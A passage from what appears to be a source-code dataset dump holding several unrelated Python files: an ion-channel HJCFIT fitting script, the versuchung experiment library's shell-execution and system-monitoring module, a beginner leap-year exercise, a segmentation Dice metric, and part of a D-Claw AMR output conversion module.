shuts.splitlines()[11].split('\\t')[1]\n p2_mod = shuts.splitlines()[11].split('\\t')[2]\n\n shuts_format = 't1: ' + t1_mod + ' p1: ' + p1_mod + ' t2: ' + t2_mod + ' p2: ' + p2_mod\n\n t, ipdf, epdf, apdf = scpl.shut_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fshut(t)')\n plt.xlabel('Shut time, ms')\n plt.title(file_name + ' ' + sc_type + ' ' + str(sc_tres*1000000) + ' ' + str(sc_tcrit*1000) + '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + file_name.strip('.abf') + '_shut_plot.png')\n plt.close()\n #plt.show()\n\n\n # plot and events times for openings and shuts, works only for complex models\n if sc_model in ['CFOODD', 'CFOOD', 'CFOO']:\n\n event_times_data = scl.printout_distributions(mec, sc_tres)\n print(event_times_data)\n\n event_times_log = open(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_event_times.txt', 'w')\n n = 
event_times_log.write(event_times_data)\n event_times_log.close()\n\n t, ipdf, epdf, apdf = scpl.shut_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fshut(t)')\n plt.xlabel('Shut time, ms')\n plt.title(sc_type + ' ' + file_name + ' ' + str(sc_tres*1000000) + ' ' + str(sc_tcrit*1000) )#+ '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_shut_plot.png')\n plt.close()\n #plt.show()\n\n t, ipdf, epdf, apdf = scpl.open_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fopen(t)')\n plt.xlabel('Open time, ms')\n plt.title(sc_type + ' ' + file_name + ' ' + str(sc_tres * 1000000) + ' ' + str(\n sc_tcrit * 1000)) # + '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_open_plot.png')\n plt.close()\n # plt.show()\n\n # results saving below:\n\n if sc_model == 'CO':\n\n alpha = mec.Rates[0].rateconstants[0]\n beta = mec.Rates[1].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'alpha': alpha, 'beta': beta,\n }\n\n elif sc_model == 'CFO':\n\n alpha = mec.Rates[0].rateconstants[0]\n beta = mec.Rates[1].rateconstants[0]\n gamma = mec.Rates[2].rateconstants[0]\n delta = mec.Rates[3].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'alpha': alpha, 'beta': beta,\n 'gamma': gamma, 'delta': delta,\n 't1_mod': t1_mod, 'p1_mod': p1_mod, 't2_mod': t2_mod, 'p2_mod': p2_mod,\n 't1_exp': sc_t1_exp, 'p1_exp': sc_p1_exp, 't2_exp': sc_t2_exp, 'p2_exp': sc_p2_exp\n }\n\n elif sc_model == 'CFOO':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = mec.Rates[5].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap, 'gamma': gamma}\n\n elif sc_model == 'CFOOD':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = mec.Rates[5].rateconstants[0]\n d = mec.Rates[6].rateconstants[0]\n r = mec.Rates[7].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap,\n 'gamma': gamma, 'delta': delta, 'd': d, 'r': r}\n\n elif sc_model == 'CFOD':\n\n beta = mec.Rates[0].rateconstants[0]\n alpha = mec.Rates[1].rateconstants[0]\n delta = mec.Rates[2].rateconstants[0]\n gamma = mec.Rates[3].rateconstants[0]\n d = mec.Rates[4].rateconstants[0]\n r = mec.Rates[5].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'alpha': alpha,\n 'gamma': gamma, 'delta': delta, 'd': d, 'r': r}\n\n elif sc_model == 'CFOODD':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = 
mec.Rates[5].rateconstants[0]\n d = mec.Rates[6].rateconstants[0]\n dp = mec.Rates[7].rateconstants[0]\n r = mec.Rates[8].rateconstants[0]\n rp = mec.Rates[9].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap,\n 'gamma': gamma, 'delta': delta, 'd': d, 'dp': dp, 'r': r, 'rp': rp}\n\n results.append(refer_result)\n\nresults = pd.DataFrame(results)\nprint(results)\nresults.to_csv('hjcfit_rates_' + project + '.csv')\n\n\n","repo_name":"michal2am/bioscripts","sub_path":"single_channel/fit_HJCFIT.py","file_name":"fit_HJCFIT.py","file_ext":"py","file_size_in_byte":15977,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"11971029338","text":"# This file is part of versuchung.\n# \n# versuchung is free software: you can redistribute it and/or modify it under the\n# terms of the GNU General Public License as published by the Free Software\n# Foundation, either version 3 of the License, or (at your option) any later\n# version.\n# \n# versuchung is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE. See the GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License along with\n# versuchung. If not, see <http://www.gnu.org/licenses/>.\n\nfrom subprocess import *\nfrom versuchung.files import CSV_File\nimport logging\nimport os\nimport resource\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\nimport time\nimport pipes\nfrom versuchung.tools import AdviceManager, Advice\nfrom multiprocessing import cpu_count as __cpu_count\n\n\ntry:\n cpu_count = __cpu_count()\nexcept NotImplementedError:\n cpu_count = 1\n\nclass CommandFailed(RuntimeError):\n \"\"\" Indicates that some command failed\n\n Attributes:\n command: the command that failed\n\n returncode: the exitcode of the failed command\n \"\"\"\n def __init__(self, command, returncode, stdout=\"\"):\n assert(returncode != 0)\n self.command = command\n self.returncode = returncode\n self.repr = \"Command %s failed to execute (returncode: %d)\" % \\\n (command, returncode)\n self.stdout = stdout\n RuntimeError.__init__(self, self.repr)\n def __str__(self):\n return self.repr + \"\\n\\nSTDOUT:\\n\" + self.stdout\n\ndef quote_args(args):\n if len(args) == 1 and type(args[0]) == dict:\n ret = {}\n for k,v in args[0].items():\n ret[k] = pipes.quote(v)\n return ret\n elif type(args) == list or type(args) == tuple:\n args = tuple([pipes.quote(x) for x in args])\n else:\n assert False\n return args\n\n\ndef __shell(failok, command, *args, **kwargs):\n os.environ[\"LC_ALL\"] = \"C\"\n\n args = quote_args(args)\n command = command % args\n\n options = {'stdout': PIPE, 'stderr': STDOUT,\n 'shell': True, 'universal_newlines': True}\n options.update(**kwargs)\n\n logging.debug(\"executing: \" + command)\n p = Popen(command, **options)\n stdout = \"\"\n while True:\n x = p.stdout.readline()\n if not x:\n break\n stdout += x\n logging.debug(\"stdout|%s\", x.replace(\"\\n\", \"\"))\n p.wait()\n if len(stdout) > 0 and stdout[-1] == '\\n':\n stdout = stdout[:-1]\n\n if not failok and p.returncode != 0:\n raise CommandFailed(command, p.returncode, stdout)\n\n return (stdout.__str__().rsplit('\\n'), p.returncode)\n\n\n@AdviceManager.advicable\ndef shell(command, *args, **kwargs):\n \"\"\"\n | 
Executes ``args[0] % args[:1]`` in a shell.\n | Keyword Arguments are passed through to the corresponding ``Popen()`` call.\n | By default the following kwargs are passed:\n\n +------------------------+----------------------+\n | Keyword | Value |\n +========================+======================+\n | ``shell`` | ``True`` |\n +------------------------+----------------------+\n | ``stdout`` | ``subprocess.PIPE`` |\n +------------------------+----------------------+\n | ``stderr`` | ``subprocess.STDOUT``|\n +------------------------+----------------------+\n | ``universal_newlines``| ``True`` |\n +------------------------+----------------------+\n\n .. note::\n\n The following command enables capturing `stderr`, `stdout` and\n runtime information (with `/usr/bin/time`)::\n\n shell.track(experiment.path)\n\n .. note::\n\n Tracking is enabled automatically after setup. It can be disabled\n and re-enabled while running the experiment with::\n\n >> shell.track.disable()\n >> shell.track.enable()\n\n The tracking feature creates files like ``shell_0_time``,\n ``shell_0_stderr``, and so on. These files are created in the\n ``experiment.path`` directory.\n\n .. note::\n\n To write the results of the tracking feature into the experiment\n output folder, use ``self.path`` within a :meth:`run()` method of\n an experiment::\n\n shell.track(experiment.path)\n\n\n :rtype: a tuple with:\n\n 1. the command's standard output as list of lines\n 2. the exitcode\n\n :raises: :exc:`CommandFailed` if the returncode is != 0\n \"\"\"\n return __shell(False, command, *args, **kwargs)\n\n@AdviceManager.advicable\ndef shell_failok(command, *args, **kwargs):\n \"\"\"Like :meth:`.shell`, but the throws no exception\"\"\"\n return __shell(True, command, *args, **kwargs)\n\n\ndef add_sys_path(path):\n \"\"\"Add path to the PATH environment variable\"\"\"\n os.environ[\"PATH\"] = path + \":\" + os.environ[\"PATH\"]\n\nclass AdviceShellTracker(Advice):\n def __call__(self, base_directory):\n self.base_directory = base_directory\n assert os.path.isdir(base_directory)\n self.count = 0\n # Enable the Advice\n self.enable()\n \n def around(self, func, args, kwargs):\n assert len(args) > 0\n command = args[0]\n import versuchung.execute\n args = versuchung.execute.quote_args(list(args)[1:])\n command = command % args\n\n cmd = \"/usr/bin/time --verbose -o %s_time sh -c %s 2> %s_stderr\"\n base = os.path.join(self.base_directory, \"shell_%d\" % self.count)\n self.count += 1\n args = tuple([cmd, base, command, base])\n\n # Dump away stdout\n ret = func(args, kwargs)\n with open(base + \"_stdout\", \"w+\") as fd:\n fd.write(\"\\n\".join(ret[0]) + \"\\n\")\n return ret\n\nshell.track = AdviceShellTracker(\"versuchung.execute.shell\")\nshell_failok.track = AdviceShellTracker(\"versuchung.execute.shell_failok\")\n\n\n\nclass MachineMonitor(CSV_File):\n \"\"\"Can be used as: **input parameter** and **output parameter**\n\n With this parameter the systems status during the experiment can\n be monitored. The tick interval can specified on creation and also\n what values should be captured.\n\n This parameter creates a :class:`~versuchung.files.CSV_File` with\n the given name. 
When the experiment starts the monitor fires up a\n thread which will every ``tick_interval`` milliseconds capture the\n status of the system and store the information as a row in the\n normal csv.\n\n A short example::\n\n class SimpleExperiment(Experiment):\n outputs = {\"ps\": MachineMonitor(\"ps_monitor\", tick_interval=100)}\n\n def run(self):\n shell(\"sleep 1\")\n shell(\"seq 1 100000 | while read a; do echo > /dev/null; done\")\n shell(\"sleep 1\")\n\n experiment = SimpleExperiment()\n experiment(sys.argv)\n\n >>> experiment.o.ps.extract([\"time\", \"net_send\"])\n [[1326548338.701827, 0],\n [1326548338.810422, 3],\n [1326548338.913667, 0],\n [1326548339.016836, 0],\n [1326548339.119982, 2],\n ....\n\n \"\"\"\n def __init__(self, default_filename = \"\", tick_interval=100, capture = [\"cpu\", \"mem\", \"net\", \"disk\"]):\n CSV_File.__init__(self, default_filename)\n self.tick_interval = tick_interval\n self.__running = True\n self.capture = capture\n\n def __get_cpu(self):\n return [self.psutil.cpu_percent()]\n\n def __get_memory(self):\n phymem = self.psutil.virtual_memory()\n virtmem = self.psutil.swap_memory()\n cached = self.psutil.virtual_memory().cached\n buffers = self.psutil.virtual_memory().buffers\n\n return [phymem.total, phymem.used, phymem.free,\n virtmem.total, virtmem.used, virtmem.free,\n cached, buffers]\n\n def __get_net(self):\n if not hasattr(self, \"old_network_stat\"):\n self.old_network_stat = self.psutil.net_io_counters()\n stat = self.psutil.net_io_counters()\n ret = [stat.bytes_sent - self.old_network_stat.bytes_sent,\n stat.bytes_recv - self.old_network_stat.bytes_recv]\n self.old_network_stat = stat\n return ret\n\n def __get_disk(self):\n if not hasattr(self, \"old_disk_stat\"):\n self.old_disk_stat = self.psutil.disk_io_counters()\n stat = self.psutil.disk_io_counters()\n ret = [stat.read_bytes - self.old_disk_stat.read_bytes,\n stat.write_bytes - self.old_disk_stat.write_bytes]\n self.old_disk_stat = stat\n return ret\n\n\n def monitor_thread(self):\n try:\n import psutil\n self.psutil = psutil\n except ImportError:\n raise RuntimeError(\"Please install psutil to use PsMonitor\")\n\n while self.__running:\n row = [time.time()]\n if \"cpu\" in self.capture:\n row += self.__get_cpu()\n else:\n row += [-1]\n\n if \"mem\" in self.capture:\n row += self.__get_memory()\n else:\n row += [-1,-1,-1,-1,-1,-1,-1,-1]\n\n if \"net\" in self.capture:\n row += self.__get_net()\n else:\n row += [-1,-1]\n\n if \"disk\" in self.capture:\n row += self.__get_disk()\n else:\n row += [-1,-1]\n\n assert len(row) == len(self.sample_keys)\n self.append(row)\n\n\n time.sleep(self.tick_interval/1000.0)\n\n def inp_extract_cmdline_parser(self, opts, args):\n CSV_File.inp_parser_extract(self, opts, None)\n self.event_file = CSV_File(self.path + \".events\")\n\n def before_experiment_run(self, parameter_type):\n if parameter_type == \"output\":\n CSV_File.before_experiment_run(self, \"output\")\n self.event_file = CSV_File(self.path + \".events\")\n self.event_file.before_experiment_run(\"output\")\n self.thread = thread.start_new_thread(self.monitor_thread, tuple())\n\n def after_experiment_run(self, parameter_type):\n if parameter_type == \"output\":\n self.__running = False\n time.sleep(self.tick_interval/1000.0)\n CSV_File.after_experiment_run(self, \"output\")\n self.event_file.after_experiment_run(\"output\")\n\n\n sample_keys = [\"time\", \"cpu_percentage\",\n \"phymem_total\", \"phymem_used\", \"phymem_free\",\n \"virtmem_total\", \"virtmem_used\", \"virtmem_free\",\n 
\"cached\", \"buffers\", \"net_send\", \"net_recv\",\n \"disk_read\", \"disk_write\"]\n\n \"\"\"The various fields in the csv file are organized like the\n strings in this list. E.g. The unix time is the first field of the\n csv file.\"\"\"\n\n\n def extract(self, keys = [\"time\", \"cpu_percentage\"]):\n \"\"\"Extract single columns from the captured\n information. Useful keys are defined in\n :attr:`~.sample_keys`\"\"\"\n indices = [self.sample_keys.index(x) for x in keys]\n ret = []\n for row in self.value:\n r = []\n for index in indices:\n r.append(row[index])\n ret.append(r)\n return ret\n","repo_name":"stettberger/versuchung","sub_path":"versuchung/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"35391428334","text":"# 变量和获取输入\n# 变量是用来存储各种值的\n# 有哪些类型的值可以存在变量里:\n# +1 / -1 / 0 - 整数 - int(eger)\n# 1/2 - 浮点数\n# 3.1415 - 浮点数\n# \"Fiona\" - 字符串\n# [1, 2, 3, 4, 5] - list, 列表\n#\n# 真 / 假 => 布尔变量 => True / False\n# 2 > 1, 1/2 等于 0.5 => True\n# 1 > 2, 1/2 大于 0.5 => False\n#\n# (我们写的这个程序)获取(执行我们这个程序的人)输入\n# input - 获取用户输入的函数\n# 我们如何能得到用户的这个输入?\n# name = input(\"Please input your name: \")\n\n# 打印变量 name 的值\n# Your name is: ?????\n# f(ormat)-String: 格式字符串\n# print(f\"Your name is: {name}\")\n\n# 写一个程序,输入一个年份,输出这个年份是不是闰年。\nyear = input(\"Please input the year:\")\n# 从 input 获取到的值的类型是字符串\n# 此时,我们从键盘获取的用户输入 year,这里面保存的是一个字符串。\n# ** 从 input 获取到的任何输入,他的类型都是字符串。**\n\n# 判断 year 的值是不是一个闰年\nyear = int(year) # \"2000\" => 2000\n\n\n# 判读闰年的方法?\n# ** 如果年份可以被 400 整除,那么这年是个闰年 **\n# % 运算符 - 计算两个数字相除的余数\n# 6 % 2 = 0\n# 8 % 5 = 3\n# 1 除以 9 = 1 里面包含多少个 9 = 0\n# 1 除以 9 商 0 余 1\n# 3 除以 7 = 3 里面包含多少 7 = 0\n# 3 除以 7 商 0 余 3\n# 6 % 9 = 6\n# 1 % 8 = 1\n# 判断 year % 400 是否等于 0\n#\n\ndef is_leap_year(y: int) -> bool:\n if y % 400 == 0:\n return True\n elif y % 4 == 0 and y % 100 != 0:\n return True\n else:\n return False\n\n\nif is_leap_year(year):\n print(f\"{year} is leap year.\")\nelse:\n print(f\"{year} is not leap year.\")\n","repo_name":"puretears/fiona-python-essential","sub_path":"0102.py","file_name":"0102.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16626833091","text":"eps = 1e-5\ndef f1_score(o, t):\n num = 2*(o*t).sum() + eps\n den = o.sum() + t.sum() + eps\n return num/den\n\n\n#https://github.com/ellisdg/3DUnetCNN\n#https://github.com/ellisdg/3DUnetCNN/blob/master/brats/evaluate.py\n#https://github.com/MIC-DKFZ/BraTS2017/blob/master/utils_validation.py\ndef dice(output, target):\n ret = []\n # whole\n o = output > 0; t = target > 0\n ret += f1_score(o, t),\n # core\n o = (output==1) | (output==4)\n t = (target==1) | (target==4)\n ret += f1_score(o , t),\n # active\n o = (output==4); t = (target==4)\n ret += f1_score(o , t),\n\n return ret\n\nkeys = 'whole', 'core', 'enhancing', 'loss'","repo_name":"zwxu064/RANP","sub_path":"third_party/miccai/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16111049708","text":"#!/usr/bin/python\n\"\"\"\nfile: fortconvert\n=========\n Provides several functions\n for manipulating output data in AMR files, fort.qXXXX\n into other formats of grids with non-overlapping data (scattered, uniform, topotype)\n\n Contains:\n\n convertfortdir (convert entire directory or files from directory)\n 
fort2topotype (create file in the form of topotype for a single component of q or b.)\n fort2xyqscatter (finest grid data for entire domain as x,y,q scattered data)\n fort2refined (covert fort.qXXXX with amr into a single uniform grid with highest level spacing)\n fort2uniform (covert fort.qXXXX with amr into a single uniform grid with user defined spacing)\n fort2griddata\n fort2griddata_vector\n fort2griddata_framenumbers\n fort2list (used to read fort data...4.x compatible...)\n forttheaderread\n fortqheaderread\n forttheaderwrite\n fortqheaderwrite\n pointfromfort\n intersection\n griddata2fort\n array2fort\n\n\n Future plans:\n probably should use the pyclaw solution class rather than solutionlist\n or at least provide options for both.\n\n provide conversion to clawpack netcdf and possibly other binary formats.\n\n Note:\n this was done expeditiously and might be inefficient or bug infested\n (KRB 2022.06.14): x,y locations considered here represent CELL CENTERS\n rather than lower left corner of cells.\n\n David George dgeorge@uw.edu 2014.05.20\n\n\"\"\"\n\nimport copy\nimport os\nimport string\n\nimport numpy as np\n\nimport dclaw.topotools as gt\nimport dclaw.netcdf_tools as gn\n\n\n# ================================================================================\ndef convertfortdir(\n outputtype,\n nplots=\"fort.nplot\",\n outputname=\"fort.q\",\n components=\"all\",\n outdir=None,\n fortdir=None,\n parallel=False,\n num_cores=1,\n **kwargs\n):\n\n \"\"\"\n convert an entire directory of fort.q files to another form\n\n arguments:\n ---------\n outputtype: 'scattered','topotype' , 'fortrefined' , 'fortuniform'\n Note: only scattered option retains actual non-interpolated output, generally.\n --scattered: highest level data as columns x,y,q\n --topotype: like a DEM with a single component of q (useful for GIS software)\n --fortrefined: standard clawpack output style, but a single grid at highest resolution\n --fortuniform: standard clawpack output style, but a single grid with user defined grid parameters.\n nplots: integer for the number of plots, list of plots or fort.nplot filename\n a sinlge integer will be all plots up to that integer\n for individual plots make nplots a list\n outputname: the base name of the output files...filenames will be appended with frameno\n components: for scattered and fort a list of components q, or 'all'\n For topotype it must be an integer to select the single component of q, or 'topo' to get eta-h,\n or 'depth' to get nodata_value where h=0...for plotting purposes.\n outdir: specify a directory for files to go in relative to cwd\n fortdir: location of fort.q files if not ./\n parallel: bool flag whether to use parallel processing (needs joblib, default false)\n num_cores: num cores to use if doing parallel (default 1)\n topotype: topotype to output to. If provided when using \"fortrefined\" or \"fortuniform\",\n output will get written to the specified topotype instead of to the standard\n fort.qXXX file type. A fort.tXXXX will also get written. 
The geotiff will have\n the name fort_qXXXX.tif\n **kwargs: for topotype: xll,yll,cellsize,ncols,nrows,topotype = 1,2,3,'gdal', 'gtif' (for standard gdal/esri header)\n for fortuniform: xlower,ylower,mx,my\n if using topotype=\"gtif\" can provide epsg=XXXX (EPSG code for CRS)\n if kwargs are omitted the grid parameters are taken from the fort file with finest level spacing\n\n\n \"\"\"\n\n if not fortdir:\n fortdir = \".\"\n\n if not outdir:\n outdir = \".\"\n elif not os.path.isdir(outdir):\n os.system((\"mkdir \" + outdir))\n\n curdir = os.path.abspath(os.path.curdir)\n fortdir = os.path.abspath(fortdir)\n outdir = os.path.abspath(outdir)\n\n write_level = kwargs.get(\"write_level\", False)\n east = kwargs.get(\"east\", None)\n west = kwargs.get(\"west\", None)\n south = kwargs.get(\"south\", None)\n north = kwargs.get(\"north\", None)\n\n bilinear = kwargs.get(\"bilinear\", True)\n\n if east is not None and west is not None:\n assert east > west\n if north is not None and south is not None:\n assert north > south\n\n epsg = kwargs.get(\"epsg\", None)\n\n if outputtype == \"topotype\":\n try:\n xll = kwargs[\"xll\"]\n yll = kwargs[\"yll\"]\n nrows = kwargs[\"nrows\"]\n ncols = kwargs[\"ncols\"]\n cellsize = kwargs[\"cellsize\"]\n except:\n print(\"using grid parameters from fort.qXXXX files\")\n xll = None\n yll = None\n nrows = None\n ncols = None\n cellsize = None\n\n try:\n topotype = kwargs[\"topotype\"]\n except:\n topotype = 2\n\n if outputtype == \"fortuniform\":\n try:\n xlower = kwargs[\"xlower\"]\n ylower = kwargs[\"ylower\"]\n xupper = kwargs[\"xupper\"]\n yupper = kwargs[\"yupper\"]\n mx = kwargs[\"mx\"]\n my = kwargs[\"my\"]\n\n except:\n print(\n \"for outputtype==fortuniform you must provide xlower,ylower,xupper,yupper,mx,my as kwargs\"\n )\n raise ValueError()\n\n if isinstance(nplots, str):\n nplotfile = os.path.join(fortdir, nplots)\n fin = open(nplotfile, \"r\")\n nplots = fin.readline()\n nplots = int(nplots)\n nplots = np.arange(nplots + 1)\n fin.close()\n elif isinstance(nplots, int):\n nplots = np.arange(nplots + 1)\n print((\"converting frames 0 - %s\" % (nplots)))\n print(\"to convert individual frames, call with nplots = a list of frames\")\n else:\n nplots = np.array(nplots, dtype=int)\n\n os.chdir(fortdir)\n\n arg_list = []\n\n for frameno in nplots:\n numstring = str(10000 + frameno)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n # print(('converting '+os.path.join(fortdir,fortqname)))\n outfname = os.path.join(outdir, outputname + framenostr)\n\n # print(('writing to ' +outfname))\n\n if outputtype == \"scattered\":\n _func = fort2xyqscattered\n arg_list.append([frameno, outfname, components])\n\n elif outputtype == \"topotype\":\n _func = fort2topotype\n arg_list.append(\n [\n frameno,\n outfname,\n fortdir,\n xll,\n yll,\n cellsize,\n ncols,\n nrows,\n components,\n topotype,\n bilinear\n ]\n )\n\n elif outputtype == \"fortrefined\":\n outfortt = os.path.join(outdir, \"fort.t\" + framenostr)\n topotype = kwargs.get(\"topotype\", None)\n _func = fort2refined\n\n arg_list.append(\n [\n frameno,\n outfname,\n outfortt,\n components,\n topotype,\n write_level,\n west,\n east,\n south,\n north,\n epsg,\n bilinear,\n ]\n )\n\n elif outputtype == \"fortuniform\":\n outfortt = os.path.join(outdir, \"fort.t\" + framenostr)\n topotype = kwargs.get(\"topotype\", None)\n _func = fort2uniform\n\n arg_list.append(\n [\n frameno,\n outfname,\n outfortt,\n xlower,\n xupper,\n ylower,\n yupper,\n mx,\n my,\n 
components,\n topotype,\n write_level,\n epsg,\n bilinear,\n ]\n )\n\n # now run in parallel based on func and arg list\n if parallel:\n try:\n from joblib import Parallel, delayed\n except ImportError:\n raise ImportError(\"joblib needed for parallel functionality\")\n Parallel(n_jobs=num_cores)(delayed(_func)(*args) for args in arg_list)\n else:\n # loop through prepared args.\n for args in arg_list:\n print((\"Converting {}\".format(args[1])))\n _func(*args)\n\n # return to curdir if changed.\n os.chdir(curdir)\n\n\n# =============================================================================\ndef fort2xyqscattered(framenumber, outfile=None, components=\"all\"):\n \"\"\"\n convert a fort.qXXXX amr file into a scattered data with columns x,y,q...\n q can be 1-meqn columns according to the list 'components'\n data is taken from the finest of grid intersections\n\n data are returned with x,y coordinates reflecting the cell center.\n\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfile: name or file handle or None\n if outfile=None routine returns a numpy array\n components: list of q components eg. [1,3,5] or 'all' for all components\n \"\"\"\n\n if isinstance(outfile, str):\n fout = open(outfile, \"w\")\n else:\n fout = outfile\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n levels = solutionlist[0][\"AMR_maxlevel\"]\n\n # note that solutionlist is ordered from highest levels to lowest.\n for grid in solutionlist:\n if grid[\"AMR_level\"] == levels: # highest level...data assumed nonoverlapping\n x = grid[\"xlow\"] + grid[\"dx\"] * (0.5 + (np.arange(grid[\"mx\"], dtype=float))) # converted from lower left to cell center\n y = grid[\"ylow\"] + grid[\"dy\"] * (0.5 + (np.arange(grid[\"my\"], dtype=float)))\n Q = grid[\"data\"][:, qlst]\n (X, Y) = np.meshgrid(x, y)\n X = np.reshape(X, (grid[\"mx\"] * grid[\"my\"], 1))\n Y = np.reshape(Y, (grid[\"mx\"] * grid[\"my\"], 1))\n\n try:\n XYQ = np.vstack((XYQ, np.hstack((X, Y, Q))))\n except:\n XYQ = np.hstack((X, Y, Q))\n gridrect = [grid[\"xlow\"], grid[\"ylow\"], grid[\"xupper\"], grid[\"yupper\"]]\n else: # not highest level\n # check for intersection\n gridrect = [grid[\"xlow\"], grid[\"ylow\"], grid[\"xupper\"], grid[\"yupper\"]]\n gridoverlap = False\n for rectangle in rectangles:\n if intersection(gridrect, rectangle):\n gridoverlap = True\n break\n if not gridoverlap: # take all data\n x = grid[\"xlow\"] + grid[\"dx\"] * (\n 0.5 + (np.arange(grid[\"mx\"], dtype=float))\n )\n y = grid[\"ylow\"] + grid[\"dy\"] * (\n 0.5 + (np.arange(grid[\"my\"], dtype=float))\n )\n Q = grid[\"data\"][:, qlst]\n (X, Y) = np.meshgrid(x, y)\n X = np.reshape(X, (grid[\"mx\"] * grid[\"my\"], 1))\n Y = np.reshape(Y, (grid[\"mx\"] * grid[\"my\"], 1))\n XYQ = np.vstack((XYQ, np.hstack((X, Y, Q))))\n else: # need to loop to find points\n row = 0\n for j in range(grid[\"my\"]):\n y = grid[\"ylow\"] + grid[\"dy\"] * (0.5 + float(j))\n for i in range(grid[\"mx\"]):\n x = grid[\"xlow\"] + grid[\"dx\"] * (0.5 + float(i))\n q = grid[\"data\"][row, qlst]\n # check point\n gridoverlap = False\n for rectangle in rectangles:\n if intersection([x, y, x, y], rectangle):\n gridoverlap = True\n break\n if not gridoverlap:\n XYQ = np.vstack((XYQ, np.hstack((x, y, q))))\n row = row + 1\n 
try:\n rectangles = np.vstack((rectangles, gridrect))\n except:\n rectangles = gridrect\n\n if not outfile:\n return XYQ\n else:\n np.savetxt(fout, XYQ)\n fout.close()\n\n\n# ==============================================================================\ndef fort2uniform(\n framenumber,\n outfortq,\n outfortt,\n xlow,\n xhi,\n ylow,\n yhi,\n mx,\n my,\n components=\"all\",\n topotype=None,\n write_level=False,\n epsg=None,\n bilinear=True,\n):\n \"\"\"\n convert fort.qXXXX with AMR data into fort.qXXXX with data on a uniform single grid.\n Resolution is user defined.\n Format is still standard clawpack fort.qXXXX /fort.tXXXX and can be plotted with clawpack utilities\n Should call with outdir being a new directory to keep original fort.q/fort.t files. Names are the same\n\n x,y of results are provided as cell centers.\n\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfortq: name of output fort.qXXXX file\n outfortt: name of output fort.tXXXX file\n if above =None routine returns a numpy array\n xlower,xupper,ylower,yupper,mx,my: output grid parameters\n components: list of q components eg. [1,3,5] or 'all' for all components\n xlow\n xhi\n ylow\n yhi\n mx\n my\n components = \"all\"\n topotype\n write_level\n epsg\n \"\"\"\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n dx = float((xhi - xlow) / mx)\n dy = float((yhi - ylow) / my)\n\n # print(dx, dy, mx, my, xlow, xhi, ylow, yhi )\n fortheader = {}\n fortheader[\"grid_number\"] = 1\n fortheader[\"AMR_level\"] = 1\n fortheader[\"mx\"] = mx\n fortheader[\"my\"] = my\n fortheader[\"xlow\"] = xlow\n fortheader[\"ylow\"] = ylow\n fortheader[\"dx\"] = dx\n fortheader[\"dy\"] = dy\n fortheader[\"naux\"] = 